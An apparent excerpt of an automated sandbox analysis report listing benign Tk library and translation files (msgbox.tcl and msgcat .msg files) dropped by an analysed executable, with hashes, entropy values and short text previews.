SSDEEP:	384:aWsDPYblrrdc2fjAwnAVphS3OJifWMCXEcjY:an2fjAwMhDifgXt0
MD5:	C157309C857AE2B6AEC5AC0E37F0D28F
SHA1:	ACA7F286D579A4480728BB379492E4F241266920
SHA-256:	3DE607042231819ECFB9FEAB86B23AAAF88AF9352E23D50A5560CDC1E0B55021
SHA-512:	BC4038E35526201B32EDD6417C4943A27D5ABBD19ABEAABD3A3E15503C323B9731624DABBF244F0349450921A54576C661F61F2858ED176C4D9FD69D20B6561E
Malicious:	false
Preview:	# msgbox.tcl --.#.#.Implements messageboxes for platforms that do not have native.#.messagebox support..#.# Copyright (c) 1994-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# Ensure existence of ::tk::dialog namespace.#.namespace eval ::tk::dialog {}..image create bitmap ::tk::dialog::b1 -foreground black \.-data "#define b1_width 32\n#define b1_height 32.static unsigned char q1_bits[] = {. 0x00, 0xf8, 0x1f, 0x00, 0x00, 0x07, 0xe0, 0x00, 0xc0, 0x00, 0x00, 0x03,. 0x20, 0x00, 0x00, 0x04, 0x10, 0x00, 0x00, 0x08, 0x08, 0x00, 0x00, 0x10,. 0x04, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00, 0x40, 0x02, 0x00, 0x00, 0x40,. 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80,. 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80,. 0x01, 0x00, 0x00, 0x80, 0x02, 0x00, 0x00, 0x40, 0x02, 0x00, 0x00, 0x40,. 0x04, 0x00, 0x00, 0x20, 0x08, 0x00,

C:\Users\user\Desktop\tk\msgs\cs.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4506
Entropy (8bit):	4.741055603590887
Encrypted:	false
SSDEEP:	48:R9gwwTNGN62C9Gq+quUa9DwvlgtnSsgPVp5QanWQfl5:Rq7TNuC9Squg9gcsgPVcS5
MD5:	9A24B935D8E3F60A0947CF3F16917575
SHA1:	E9DB0557F08272C2A82FDACA06D46970347B476D
SHA-256:	A3419AF7BDEFCB892BF6410EC71BF95EEA2E715E9BBAC53FB93B63A3F84256CE
SHA-512:	7E84420277919E9C5E38A68E76115812E95343E721A313BE350A691510BE68D4A0B5554139AF4FA681A16BB11DF11E8A7356A08463105A9712E37AF43AB34F45
Malicious:	false
Preview:	namespace eval ::tk {. ::msgcat::mcset cs "&Abort" "&P\u0159eru\u0161it". ::msgcat::mcset cs "&About..." "&O programu...". ::msgcat::mcset cs "&Blue" "&Modr\341". ::msgcat::mcset cs "&Cancel" "&Zru\u0161it". ::msgcat::mcset cs "&Clear Console" "&Smazat konzolu". ::msgcat::mcset cs "&Copy" "&Kop\355rovat". ::msgcat::mcset cs "&Delete" "&Smazat". ::msgcat::mcset cs "&Directory:" "&Adres\341\u0159:". ::msgcat::mcset cs "&Edit" "&\332pravy". ::msgcat::mcset cs "&File" "&Soubor". ::msgcat::mcset cs "&Filter" "&Filtr". ::msgcat::mcset cs "&Green" "Ze&len\341". ::msgcat::mcset cs "&Help" "&N\341pov\u011bda". ::msgcat::mcset cs "&Hide Console" "&Schovat Konzolu". ::msgcat::mcset cs "&Ignore" "&Ignorovat". ::msgcat::mcset cs "&No" "&Ne". ::msgcat::mcset cs "&OK". ::msgcat::mcset cs "&Open" "&Otev\u0159\355t". ::msgcat::mcset cs "&Quit" "&Ukon\u010dit". ::msgcat::mcset cs "&Red" "\u010ce&rven\341". ::msgcat::mcset cs "&Retry" "Z&novu

C:\Users\user\Desktop\tk\msgs\da.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3866
Entropy (8bit):	4.605623854056765
Encrypted:	false
SSDEEP:	48:G8D/jSf5s80vWC0x5kTvgXTfODYE9lAUt:G8rmB0Z0x5kTv4sbt
MD5:	523DD23F26D7110CB9183AD16C837417
SHA1:	BDDBE76BC0C30CFFADD1B8DB178C480E896D9B65
SHA-256:	6D58D7F39876FF0A74BE833E6E8CEC8E2131152B821C6311B7D203CE340C8521
SHA-512:	977AFFB43AE853D4F961FD84CC48C57794BD6FAB4BB61C12750DF7EDD910A36987BC9B830C23EB487DF7ED4452D9EDB57501E2E2FB9FDA15D822540C101071A0
Malicious:	false
Preview:	namespace eval ::tk {. ::msgcat::mcset da "&Abort" "&Afbryd". ::msgcat::mcset da "&About..." "&Om...". ::msgcat::mcset da "All Files" "Alle filer". ::msgcat::mcset da "Application Error" "Programfejl". ::msgcat::mcset da "&Blue" "&Bl\u00E5". ::msgcat::mcset da "&Cancel" "&Annuller". ::msgcat::mcset da "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan ikke skifte til katalog \"%1\$s\".\nIngen rettigheder.". ::msgcat::mcset da "Choose Directory" "V\u00E6lg katalog". ::msgcat::mcset da "&Clear" "&Ryd". ::msgcat::mcset da "&Clear Console" "&Ryd konsolen". ::msgcat::mcset da "Color" "Farve". ::msgcat::mcset da "Console" "Konsol". ::msgcat::mcset da "&Copy" "&Kopier". ::msgcat::mcset da "Cu&t" "Kli&p". ::msgcat::mcset da "&Delete" "&Slet". ::msgcat::mcset da "Details >>" "Detailer". ::msgcat::mcset da "Directory \"%1\$s\" does not exist." "Katalog \"%1\$s\" findes ikke.". ::msgcat::mcset da "&Directory:" "&Katalog:".

C:\Users\user\Desktop\tk\msgs\de.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4150
Entropy (8bit):	4.594758112169527
Encrypted:	false
SSDEEP:	96:13LqlagtGIvz8MFU9RvjwKAN98qqU007Qt:6/KRrwKYtIt
MD5:	139BC00416C426A552879AB5295105A0
SHA1:	2C66C715E44BCB6EF6396D1197E9848FA3196F6F
SHA-256:	6513BEAB8B2FF7D13D6AE1455F088AEC5EFF911288889162330DF7F70B90C9ED
SHA-512:	43644BA01244BA2486DB1E75BEC325A78D7852BB319D1B4A5145E577663BC624BFD123C41F909C212D43598FDA6518486BC4D0E717BE085F7FFDA20C0FC72D19
Malicious:	false
Preview:	namespace eval ::tk {. ::msgcat::mcset de "&Abort" "&Abbruch". ::msgcat::mcset de "&About..." "&\u00dcber...". ::msgcat::mcset de "All Files" "Alle Dateien". ::msgcat::mcset de "Application Error" "Applikationsfehler". ::msgcat::mcset de "&Blue" "&Blau". ::msgcat::mcset de "&Cancel" "&Abbruch". ::msgcat::mcset de "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kann nicht in das Verzeichnis \"%1\$s\" wechseln.\nKeine Rechte vorhanden.". ::msgcat::mcset de "Choose Directory" "W\u00e4hle Verzeichnis". ::msgcat::mcset de "Cl&ear" "&R\u00fccksetzen". ::msgcat::mcset de "&Clear Console" "&Konsole l\u00f6schen". ::msgcat::mcset de "Color" "Farbe". ::msgcat::mcset de "Console" "Konsole". ::msgcat::mcset de "&Copy" "&Kopieren". ::msgcat::mcset de "Cu&t" "Aus&schneiden". ::msgcat::mcset de "&Delete" "&L\u00f6schen". ::msgcat::mcset de "Details >>". ::msgcat::mcset de "Directory \"%1\$s\" does not exist." "Das Verzeichnis \"%1\$s

C:\Users\user\Desktop\tk\msgs\el.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8609
Entropy (8bit):	4.298043622238247
Encrypted:	false
SSDEEP:	48:tCrF5o/cmSHbkI8+ETnFI3mC2hk9I+c6M30UPfMNDz9BybFkm5w+kGR8MOFiL0xc:wp5RmSHlsFerVIfM5vsam5VOQAkF
MD5:	39372CE223E6F5FAF512936833AC82E2
SHA1:	62A84DD84ACCAC75847BBB453CB4E1A1B0151ECE
SHA-256:	5544E31148EDF7D0380425875FAC92164E577BB72D3FF054182D6B0F26EB49CF
SHA-512:	55F810C46DF2E069C07FA102B88184710C6C67270DF020E7F8F753E9AC7BA3081F339E1876CC658FE92CB60CD67EB13A987BE1F3E35E627D8F325B6D5C9CE04B
Malicious:	false
Preview:	## Messages for the Greek (Hellenic - "el") language..## Please report any changes/suggestions to:.## petasis@iit.demokritos.gr..namespace eval ::tk {. ::msgcat::mcset el "&Abort" "\u03a4\u03b5\u03c1\u03bc\u03b1\u03c4\u03b9\u03c3\u03bc\u03cc\u03c2". ::msgcat::mcset el "About..." "\u03a3\u03c7\u03b5\u03c4\u03b9\u03ba\u03ac...". ::msgcat::mcset el "All Files" "\u038c\u03bb\u03b1 \u03c4\u03b1 \u0391\u03c1\u03c7\u03b5\u03af\u03b1". ::msgcat::mcset el "Application Error" "\u039b\u03ac\u03b8\u03bf\u03c2 \u0395\u03c6\u03b1\u03c1\u03bc\u03bf\u03b3\u03ae\u03c2". ::msgcat::mcset el "&Blue" "\u039c\u03c0\u03bb\u03b5". ::msgcat::mcset el "&Cancel" "\u0391\u03ba\u03cd\u03c1\u03c9\u03c3\u03b7". ::msgcat::mcset el \."Cannot change to the directory \"%1\$s\".\nPermission denied." \."\u0394\u03b5\u03bd \u03b5\u03af\u03bd\u03b1\u03b9 \u03b4\u03c5\u03bd\u03b1\u03c4\u03ae \u03b7 \u03b1\u03bb\u03bb\u03b1\u03b3\u03ae \u03ba\u

C:\Users\user\Desktop\tk\msgs\en.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2793
Entropy (8bit):	4.232798253032259
Encrypted:	false
SSDEEP:	24:sqH4qCtvLPgyqL+1ylnJzqFJHNaXSxFF4RTDuurIlnB:dYJtDPgDjnwIXSZ4RTDuTlB
MD5:	BEE15DD39FA7291FA7CCBC2171BFA885
SHA1:	3E6327758BA97EF3C27527AD7FADCD5252EB297B
SHA-256:	B8158342926DA30F6D52AEAF5C61F68866674DA22D511770EB2C1685634A34BD
SHA-512:	C9F13FF19011D7331EB3AED0EAB7B10F25CCACEC1AFB3C943F960033A8EF63819C956B02BEAF674BC6669810691DB14D155E4020C48889315711DA53A8624424
Malicious:	false
Preview:	namespace eval ::tk {. ::msgcat::mcset en "&Abort". ::msgcat::mcset en "&About...". ::msgcat::mcset en "All Files". ::msgcat::mcset en "Application Error". ::msgcat::mcset en "&Blue". ::msgcat::mcset en "&Cancel". ::msgcat::mcset en "Cannot change to the directory \"%1\$s\".\nPermission denied.". ::msgcat::mcset en "Choose Directory". ::msgcat::mcset en "Cl&ear". ::msgcat::mcset en "&Clear Console". ::msgcat::mcset en "Color". ::msgcat::mcset en "Console". ::msgcat::mcset en "&Copy". ::msgcat::mcset en "Cu&t". ::msgcat::mcset en "&Delete". ::msgcat::mcset en "Details >>". ::msgcat::mcset en "Directory \"%1\$s\" does not exist.". ::msgcat::mcset en "&Directory:". ::msgcat::mcset en "&Edit". ::msgcat::mcset en "Error: %1\$s". ::msgcat::mcset en "E&xit". ::msgcat::mcset en "&File". ::msgcat::mcset en "File \"%1\$s\" already exists.\nDo you want to overwrite it?". ::msgcat::mcset en "File \"%1\$s\" already exists.\n\n"

C:\Users\user\Desktop\tk\msgs\en_gb.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	63
Entropy (8bit):	4.185724027617087
Encrypted:	false
SSDEEP:	3:fEGp6fR1FAGoW8vMKEQXK:sooLoQO6
MD5:	EC6A7E69AB0B8B767367DB54CC0499A8
SHA1:	6C2D6B622429AB8C17E07C2E0F546469823ABE57
SHA-256:	FB93D455A9D9CF3F822C968DFB273ED931E433F2494D71D6B5F8D83DDE7EACC2
SHA-512:	72077EAB988979EB2EE292ACDB72537172A5E96B4262CE7278B76F0FEBD7E850D18221DB551D1DE3C6EB520985B5E9642936BEEB66032F920593276784525702
Malicious:	false
Preview:	namespace eval ::tk {. ::msgcat::mcset en_gb Color Colour.}.

C:\Users\user\Desktop\tk\msgs\eo.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3845
Entropy (8bit):	4.560432766214962
Encrypted:	false
SSDEEP:	48:9714EhrzeUv0xrFf+/eR0Mqp+cIFIXd/JcrtCcuUc6Sq4Pe:97148efrF2GSMqgcIFIXdhAene
MD5:	AD6C8299D63C606F46B91E55E923020A
SHA1:	4E5EEF89C33B152661C7D5D74BBE54AE3C215CC8
SHA-256:	ED651A2C8EEA8B373AF753C35EC7DFD91A284F2CAFCA8697985C83676D382E8B
SHA-512:	F3770BB399E4EA5FC28F1A39BA850A8DACC3FB8F7661BD99F3D43F3BD5548C12E5C409840CD29256EFD40C282B614E0A76E0061C8F11EFFC6828574FEBD70D21
Malicious:	false
Preview:	namespace eval ::tk {. ::msgcat::mcset eo "&Abort" "&\u0108esigo". ::msgcat::mcset eo "&About..." "Pri...". ::msgcat::mcset eo "All Files" "\u0108ioj dosieroj". ::msgcat::mcset eo "Application Error" "Aplikoerraro". ::msgcat::mcset eo "&Blue" "&Blua". ::msgcat::mcset eo "&Cancel" "&Rezignu". ::msgcat::mcset eo "Cannot change to the directory \"%1\$s\".\nPermission denied." "Neeble \u0109angi al dosierulon \"%1\$s\".\nVi ne rajtas tion.". ::msgcat::mcset eo "Choose Directory" "Elektu Dosierujo". ::msgcat::mcset eo "&Clear" "&Klaru". ::msgcat::mcset eo "&Clear Console" "&Klaru konzolon". ::msgcat::mcset eo "Color" "Farbo". ::msgcat::mcset eo "Console" "Konzolo". ::msgcat::mcset eo "&Copy" "&Kopiu". ::msgcat::mcset eo "Cu&t" "&Enpo\u015digu". ::msgcat::mcset eo "&Delete" "&Forprenu". ::msgcat::mcset eo "Details >>" "Detaloj >>". ::msgcat::mcset eo "Directory \"%1\$s\" does not exist." "La dosierujo \"%1\$s\" ne ekzistas.". ::msgcat::mc

C:\Users\user\Desktop\tk\msgs\es.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3924
Entropy (8bit):	4.499108281229709
Encrypted:	false
SSDEEP:	48:vTE1U2XR5GiWXirZe0uoH0KQyTaBi2DcDmQ/jY33lEzTCyfv:volXgFHyGB3ELxDH
MD5:	4C1B749AC7182F4F4AE0B1D17356BDE0
SHA1:	1843D238DEC98DEC543FE2AF8C392CD461DD0A72
SHA-256:	F9D5D6C76D7AF1431C332186CB9FABB2F47A98E8A970265DF312222BA6F59C0A
SHA-512:	610C4C4C26B750171304B34BA3BE501B9F2CFC252CEB40A1FA181A3087C07D6741106609A77A32BD3EFB8FF4F548852022FEF4B77159E2F01B4202E6BCC995AF
Malicious:	false
Preview:	namespace eval ::tk {. ::msgcat::mcset es "&Abort" "&Abortar". ::msgcat::mcset es "&About..." "&Acerca de ...". ::msgcat::mcset es "All Files" "Todos los archivos" . ::msgcat::mcset es "Application Error" "Error de la aplicaci\u00f3n". ::msgcat::mcset es "&Blue" "&Azul". ::msgcat::mcset es "&Cancel" "&Cancelar". ::msgcat::mcset es "Cannot change to the directory \"%1\$s\".\nPermission denied." "No es posible acceder al directorio \"%1\$s\".\nPermiso denegado.". ::msgcat::mcset es "Choose Directory" "Elegir directorio". ::msgcat::mcset es "Cl&ear" "&Borrar". ::msgcat::mcset es "&Clear Console" "&Borrar consola". ::msgcat::mcset es "Color" "Color". ::msgcat::mcset es "Console" "Consola". ::msgcat::mcset es "&Copy" "&Copiar". ::msgcat::mcset es "Cu&t" "Cor&tar". ::msgcat::mcset es "&Delete" "&Borrar". ::msgcat::mcset es "Details >>" "Detalles >>". ::msgcat::mcset es "Directory \"%1\$s\" does not exist." "El directorio \"%1\$s\" no existe.

C:\Users\user\Desktop\tk\msgs\fr.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3727
Entropy (8bit):	4.582588432323347
Encrypted:	false
SSDEEP:	48:fkErYNxfhFBqFHjApxKSOzbgRujzSAEFlBGr3jd:fkErYLpaV0KSHtXcN
MD5:	2C904D110BA900583A86838AE264438C
SHA1:	CC7C444BDA43FD5EBE0B00F68BAD42E7DFB816C2
SHA-256:	E7BA2F7A95679695504164C92B86B92AB5F7D08DCF34029E391C1683AC9FF5F3
SHA-512:	B6FBB18C061EC990BCD3120D80A0A5794B4935FFF9EE6CBF5FD231BFD0C0F1772620E11877C91D34F7FA8C5FEE71BD15C3330017C437F4DE66751D97D8BB7208
Malicious:	false
Preview:	namespace eval ::tk {. ::msgcat::mcset fr "&Abort" "&Annuler". ::msgcat::mcset fr "About..." "\u00c0 propos...". ::msgcat::mcset fr "All Files" "Tous les fichiers". ::msgcat::mcset fr "Application Error" "Erreur d'application". ::msgcat::mcset fr "&Blue" "&Bleu". ::msgcat::mcset fr "&Cancel" "&Annuler". ::msgcat::mcset fr "Cannot change to the directory \"%1\$s\".\nPermission denied." "Impossible d'acc\u00e9der au r\u00e9pertoire \"%1\$s\".\nPermission refus\u00e9e.". ::msgcat::mcset fr "Choose Directory" "Choisir r\u00e9pertoire". ::msgcat::mcset fr "Clear" "Effacer". ::msgcat::mcset fr "Color" "Couleur". ::msgcat::mcset fr "Console". ::msgcat::mcset fr "Copy" "Copier". ::msgcat::mcset fr "Cut" "Couper". ::msgcat::mcset fr "Delete" "Effacer". ::msgcat::mcset fr "Details >>" "D\u00e9tails >>". ::msgcat::mcset fr "Directory \"%1\$s\" does not exist." "Le r\u00e9pertoire \"%1\$s\" n'existe pas.". ::msgcat::mcset fr "&Directory:" "&R\u00e

C:\Users\user\Desktop\tk\msgs\hu.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4588
Entropy (8bit):	4.764869147275923
Encrypted:	false
SSDEEP:	96:GwCzxSy0Kt9C81m/HSzVqUaJf9q/x5a/mETsN:G31RCx/4vZM+EA
MD5:	7045E373D8E5A7D379AF004C5616313B
SHA1:	16D7B17FBF71234989BF356655D6D43C271A020F
SHA-256:	76453FEC72C59FD85648036B5B9FC983D7279CEC5818295E0451CF83CF7D264F
SHA-512:	F260A7D61E17ECDF52F6C36E4BBA3F881079490CDB3DCA380CE34D0012B98F9FA96550557BC6BCE267594CCD9BB63A94F45C329B25FF66144223833A5A79EB0D
Malicious:	false
Preview:	namespace eval ::tk {. ::msgcat::mcset hu "&Abort" "&Megszak\u00edt\u00e1s". ::msgcat::mcset hu "About..." "N\u00e9vjegy...". ::msgcat::mcset hu "All Files" "Minden f\u00e1jl". ::msgcat::mcset hu "All Files () " "Minden f\u00e1jl () ". ::msgcat::mcset hu "Application Error" "Alkalmaz\u00e1s hiba". ::msgcat::mcset hu "&Blue" "&K\u00e9k". ::msgcat::mcset hu "&Cancel" "M\u00e9g&sem". ::msgcat::mcset hu "Cannot change to the directory \"%1\$s\".\nPermission denied." "A k\u00f6nyvt\u00e1rv\u00e1lt\u00e1s nem siker\u00fclt: \"%1\$s\".\nHozz\u00e1f\u00e9r\u00e9s megtagadva.". ::msgcat::mcset hu "Choose Directory" "K\u00f6nyvt\u00e1r kiv\u00e1laszt\u00e1sa". ::msgcat::mcset hu "Clear" "T\u00f6rl\u00e9s". ::msgcat::mcset hu "&Clear Console" "&T\u00f6rl\u00e9s Konzol". ::msgcat::mcset hu "Color" "Sz\u00edn". ::msgcat::mcset hu "Console" "Konzol". ::msgcat::mcset hu "&Copy" "&M\u00e1sol\u00e1s". ::msgcat::mcset hu "Cu&t" "&Kiv\u00e1g\u00e1s". ::ms

C:\Users\user\Desktop\tk\msgs\it.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3557
Entropy (8bit):	4.44160619394425
Encrypted:	false
SSDEEP:	48:rpcxYo3XRzvjbhWsHTTYTxDllvOr80nC2dnGHc839kUqg:9caodbhlHYTxDlcY0HpVg
MD5:	4396605B50C75E6F7FA1C3FBD6A42799
SHA1:	5ABC6C66208FF596F49A7C576EBB30D0773F1EA0
SHA-256:	2E0FA36F75B191A2FEE3331EC0215A68DD913D62C2680555C21008286150A58F
SHA-512:	74A25EE87C2E8AD6B37BA5B17CA4B31474D71E953E7E896AF90CCC6A49CA48F503D93771A8FB947351ECEDCC40A4B1EDDE01E278442195235105C617DC8F3CA1
Malicious:	false
Preview:	namespace eval ::tk {. ::msgcat::mcset it "&Abort" "&Interrompi". ::msgcat::mcset it "About..." "Informazioni...". ::msgcat::mcset it "All Files" "Tutti i file". ::msgcat::mcset it "Application Error" "Errore dell' applicazione". ::msgcat::mcset it "&Blue" "&Blu". ::msgcat::mcset it "&Cancel" "&Annulla". ::msgcat::mcset it "Cannot change to the directory \"%1\$s\".\nPermission denied." "Impossibile accedere alla directory \"%1\$s\".\nPermesso negato.". ::msgcat::mcset it "Choose Directory" "Scegli una directory". ::msgcat::mcset it "Clear" "Azzera". ::msgcat::mcset it "Color" "Colore". ::msgcat::mcset it "Console". ::msgcat::mcset it "Copy" "Copia". ::msgcat::mcset it "Cut" "Taglia". ::msgcat::mcset it "Delete" "Cancella". ::msgcat::mcset it "Details >>" "Dettagli >>". ::msgcat::mcset it "Directory \"%1\$s\" does not exist." "La directory \"%1\$s\" non esiste.". ::msgcat::mcset it "&Directory:". ::msgcat::mcset it "Error: %1\$s" "Er

C:\Users\user\Desktop\tk\msgs\nl.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7095
Entropy (8bit):	4.65919646196926
Encrypted:	false
SSDEEP:	96:/TTnlMN3O70KFuQbL/Zs4g0GcNhHOx/bRHsa1EHL3YRYt:SRh3ILhsKQuLjt
MD5:	072E12F026647B15649ADB045847A5C2
SHA1:	1840B96A80AC1506B0510679EAB56FD799E7DCE1
SHA-256:	245A493CC77648861F3629286BDA153E2B6BF0E2499BB321FA7B18951F05BB7C
SHA-512:	D0E996662146BA431FDDE8DDD0DCC415240BAE2D66FB698AABBB6F40E9CC6B2E5298351B12BCBB187310A0F4B8B80B1BF84FFE186C9191334C66E71B2CB161E4
Malicious:	false
Preview:	namespace eval ::tk {. ::msgcat::mcset nl "\"%1\$s\" must be an absolute pathname" "\"%1\$s\" moet een absolute pad-naam zijn". ::msgcat::mcset nl "%1\$s is not a toplevel window" "%1\$s is geen toplevel window". ::msgcat::mcset nl ", or" ", of". ::msgcat::mcset nl "-default, -icon, -message, -parent, -title, or -type" "-default, -icon, -message, -parent, -title, of -type". ::msgcat::mcset nl "-initialdir, -mustexist, -parent, or -title" "-initialdir, -mustexist, -parent, of -title". ::msgcat::mcset nl "&Abort" "&Afbreken". ::msgcat::mcset nl "About..." "Over...". ::msgcat::mcset nl "All Files" "Alle Bestanden". ::msgcat::mcset nl "Application Error" "Toepassingsfout". ::msgcat::mcset nl "&Blue" "&Blauw". ::msgcat::mcset nl "&Cancel" "&Annuleren". ::msgcat::mcset nl "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan niet naar map \"%1\$s\" gaan.\nU heeft hiervoor geen toestemming.". ::msgcat::mcset nl "Choose Directory" "Kies map

C:\Users\user\Desktop\tk\msgs\pl.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3952
Entropy (8bit):	4.771874654651666
Encrypted:	false
SSDEEP:	48:mYkv1H+BBv5vVXnjB+y7oBUHHE3XQrDool2EQdWa0ybBhKG:zsH+3vLNnZHHE3XjoFYhL
MD5:	E28545F6A7B22EC237AE53C8F12A83C8
SHA1:	0BF3A4827B93D63934A099F935A484B9E101168E
SHA-256:	84F6D2498AA1438706BD9665918754275BE7FA0099CFB8A8601AE1F79915C6F0
SHA-512:	0B1FDE2B6412162361041745E288902800D72E6B1B0606B362047F0E7C9A39459660F6BB9AEA35D4CED7F225158BB0A944C2D81F731169253F6B456C9EFFFB49
Malicious:	false
Preview:	namespace eval ::tk {. ::msgcat::mcset pl "&Abort" "&Przerwij". ::msgcat::mcset pl "&About..." "O programie...". ::msgcat::mcset pl "All Files" "Wszystkie pliki". ::msgcat::mcset pl "Application Error" "B\u0142\u0105d w programie". ::msgcat::mcset pl "&Blue" "&Niebieski". ::msgcat::mcset pl "&Cancel" "&Anuluj". ::msgcat::mcset pl "Cannot change to the directory \"%1\$s\".\nPermission denied." "Nie mo\u017cna otworzy\u0107 katalogu \"%1\$s\".\nOdmowa dost\u0119pu.". ::msgcat::mcset pl "Choose Directory" "Wybierz katalog". ::msgcat::mcset pl "Cl&ear" "&Wyczy\u015b\u0107". ::msgcat::mcset pl "&Clear Console" "&Wyczy\u015b\u0107 konsol\u0119". ::msgcat::mcset pl "Color" "Kolor". ::msgcat::mcset pl "Console" "Konsola". ::msgcat::mcset pl "&Copy" "&Kopiuj". ::msgcat::mcset pl "Cu&t" "&Wytnij". ::msgcat::mcset pl "&Delete" "&Usu\u0144". ::msgcat::mcset pl "Details >>" "Szczeg\u00f3\u0142y >>". ::msgcat::mcset pl "Directory \"%1\$s\" does not

C:\Users\user\Desktop\tk\msgs\pt.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3973
Entropy (8bit):	4.677862734107109
Encrypted:	false
SSDEEP:	48:YmBmHHCnBbrvRjfgxtilIUkQIPlYwCC4x+hrmK1VZi:YmAncxVMtiXkPl2xomUQ
MD5:	1F04930642B3F4A9F16F11CC674B56A7
SHA1:	1AF829DD0A4175AF35DED50F530B4285F7A174FB
SHA-256:	611FE4FEB0FB3A8D7BADA328B6AF65C5BE9704DF334BCCD55B5E736EAA0A898F
SHA-512:	BCA4FF7F102C9AEE0BB306C5E8A34290AB7D3C7D9948809B8F31064BA5F20A7DE9EAE2D61201E602136A27B24BAEFB2C950F04AA766DA46C6025E79B1AF86DC3
Malicious:	false
Preview:	namespace eval ::tk {. ::msgcat::mcset pt_br "&Abort" "&Abortar". ::msgcat::mcset pt_br "About..." "Sobre ...". ::msgcat::mcset pt_br "All Files" "Todos os arquivos". ::msgcat::mcset pt_br "Application Error" "Erro de aplica\u00e7\u00e3o". ::msgcat::mcset pt_br "&Blue" "&Azul". ::msgcat::mcset pt_br "&Cancel" "&Cancelar". ::msgcat::mcset pt_br "Cannot change to the directory \"%1\$s\".\nPermission denied." "N\u00e3o foi poss\u00edvel mudar para o diret\u00f3rio \"%1\$s\".\nPermiss\u00e3o negada.". ::msgcat::mcset pt_br "Choose Directory" "Escolha um diret\u00f3rio". ::msgcat::mcset pt_br "Clear" "Apagar". ::msgcat::mcset pt_br "Color" "Cor". ::msgcat::mcset pt_br "Console" "Console". ::msgcat::mcset pt_br "Copy" "Copiar". ::msgcat::mcset pt_br "Cut" "Recortar". ::msgcat::mcset pt_br "Delete" "Excluir". ::msgcat::mcset pt_br "Details >>" "Detalhes >>". ::msgcat::mcset pt_br "Directory \"%1\$s\" does not exist." "O diret\u00f3rio \"%1\$s\"

C:\Users\user\Desktop\tk\msgs\ru.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7105
Entropy (8bit):	4.353661356769555
Encrypted:	false
SSDEEP:	96:NUEBGhT4YsVL3L7Pkhx2xSrw02lOzFAnxS/j49cD/qRjGSQvN8Nfo5hgV9aoTRZ/:grAPJGF8mq+WRKOGcRmRu
MD5:	202DC42C5DA0F0ACA88B1B4C30E5381B
SHA1:	9A7CC7AFBDF37C7937589E7F212ABC6E3F260D55
SHA-256:	45369C1C8853EE34C5B65C742C6AC3E03E1399E64C0958B5E4E4A927E8D30310
SHA-512:	DE6C9601010A51AAB380FD353849D91F47FFE9087DE524DA2DEBA30FF63EDF8C83FE471F8B9D733576B9732ABD881CD1D411BB1A04A0EC25CE8CFE08716C597E
Malicious:	false
Preview:	namespace eval ::tk {. ::msgcat::mcset ru "&Abort" "&\u041e\u0442\u043c\u0435\u043d\u0438\u0442\u044c". ::msgcat::mcset ru "About..." "\u041f\u0440\u043e...". ::msgcat::mcset ru "All Files" "\u0412\u0441\u0435 \u0444\u0430\u0439\u043b\u044b". ::msgcat::mcset ru "Application Error" "\u041e\u0448\u0438\u0431\u043a\u0430 \u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0435". ::msgcat::mcset ru "&Blue" " &\u0413\u043e\u043b\u0443\u0431\u043e\u0439". ::msgcat::mcset ru "&Cancel" "\u041e\u0442&\u043c\u0435\u043d\u0430". ::msgcat::mcset ru "Cannot change to the directory \"%1\$s\".\nPermission denied." \...."\u041d\u0435 \u043c\u043e\u0433\u0443 \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u0432 \u043a\u0430\u0442\u0430\u043b\u043e\u0433 \"%1\$s\".\n\u041d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043f\u0440\u0430\u0432 \u0434\u043e\u0441\u0442\u0443\u043f\u0430". ::msgcat::mcset ru "Choose Directory" "\u0412\u044b\u0431\u0435\u0440\u0

C:\Users\user\Desktop\tk\msgs\sv.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3762
Entropy (8bit):	4.613765855030883
Encrypted:	false
SSDEEP:	48:g4H5cNWBJdE10M4/0Uli6z8XIxTB2iDxypdmmZbWxOt:F5cN6H0Uli9IxTEbQsb7t
MD5:	9835887AE45B8D5B57D0B8ACF303C4B3
SHA1:	DC26BF315FB83212983D2532BC2ABB26A4987F5A
